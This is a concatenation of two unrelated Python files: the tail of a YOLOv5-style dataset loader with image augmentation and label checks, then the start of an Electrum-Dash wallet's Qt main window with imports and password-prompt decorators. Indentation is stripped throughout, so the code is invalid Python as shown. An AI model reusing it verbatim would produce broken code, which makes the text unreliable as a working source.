pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
#to [x, y, w, h] normalized
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, f'Image Not Found {path}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
nl = len(l)
if nl:
assert l.shape[1] == 5, f'labels require 5 columns, {l.shape[1]} columns detected'
assert (l >= 0).all(), f'negative label values {l[l < 0]}'
assert (l[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {l[:, 1:][l[:, 1:] > 1]}'
l = np.unique(l, axis=0) # remove duplicate rows
if len(l) < nl:
segments = np.unique(segments, axis=0)
msg = f'{prefix}WARNING: {im_file}: {nl - len(l)} duplicate labels removed'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, quality=75) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum_dash
from electrum_dash.gui import messages
from electrum_dash import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum_dash.base_crash_reporter import BaseCrashReporter
from electrum_dash.bitcoin import COIN, is_address
from electrum_dash.dash_ps_util import PSFeeTooHigh
from electrum_dash.dash_tx import DashTxError, ProTxBase, SPEC_TX_NAMES
from electrum_dash.plugin import run_hook, BasePlugin
from electrum_dash.i18n import _
from electrum_dash.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, NotEnoughFunds, FILE_OWNER_MODE,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
DASH_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME,
InvoiceError)
from electrum_dash.invoices import (PR_TYPE_ONCHAIN,
PR_DEFAULT_EXPIRATION_WHEN_CREATING,
Invoice, InvoiceExt)
from electrum_dash.invoices import PR_PAID, PR_FAILED, pr_expiration_values, OnchainInvoice
from electrum_dash.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum_dash.util import AddTransactionException
from electrum_dash.wallet import (Multisig_Wallet, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_dash.version import ELECTRUM_VERSION
from electrum_dash.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum_dash.exchange_rate import FxThread
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit, SizedFreezableLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .qrreader import scan_qrcode
from .dash_qt import ExtraPayloadWidget
from .privatesend_dialog import (find_ps_dialog, show_ps_dialog,
hide_ps_dialog, protected_with_parent,
show_ps_dialog_or_wizard)
from .protx_qt import create_dip3_tab
if TYPE_CHECKING:
from . import ElectrumGui
class StatusBarButton(QToolButton):
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(31)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def ps_ks_protected(func):
def request_ps_ks_password(self, *args, **kwargs):
psman = self.wallet.psman
if not psman.is_hw_ks:
return func(self, *args, **kwargs)
if not psman.is_ps_ks_encrypted():
return func(self, *args, **kwargs)
fname = func.__name__
if fname == 'do_sign':
addr_edit = args[0]
addr = addr_edit.text().strip()
if not psman.is_ps_ks(addr):
return func(self, *args, **kwargs)
elif fname == 'do_decrypt':
pubkey_edit = args[1]
pubkey = pubkey_edit.text().strip()
addr = psman.pubkeys_to_address(pubkey)
if not psman.is_ps_ks(addr):
return func(self, *args, **kwargs)
elif fname == 'sign_tx':
tx = args[0]
if not psman.is_ps_ks_inputs_in_tx(tx):
return func(self, *args, **kwargs)
elif fname not in ['_delete_wallet', 'show_private_key']:
return func(self, *args, **kwargs)
parent = self.top_level_window()
password = None
while psman.is_ps_ks_encrypted():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
psman.ps_keystore.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_ps_ks_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
ps_signal = pyqtSignal(str, object)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.setObjectName("main_window_container")
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet)
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
self.pending_invoice_ext = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.tabs.currentChanged.connect(self.on_tabs_switch)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.dip3_tab = create_dip3_tab(self, wallet)
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.setObjectName("main_window_nav_bar")
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
self.update_available_amount()
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QScrollArea()
central_widget.setObjectName("central_widget")
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
self.setMinimumWidth(640)
self.setMinimumHeight(400)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-dash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
self.gui_object.dash_net_sobj.main.connect(self.on_dash_net_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status',
'cert_mismatch', 'verified-islock',
'excessive-resource-usage']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
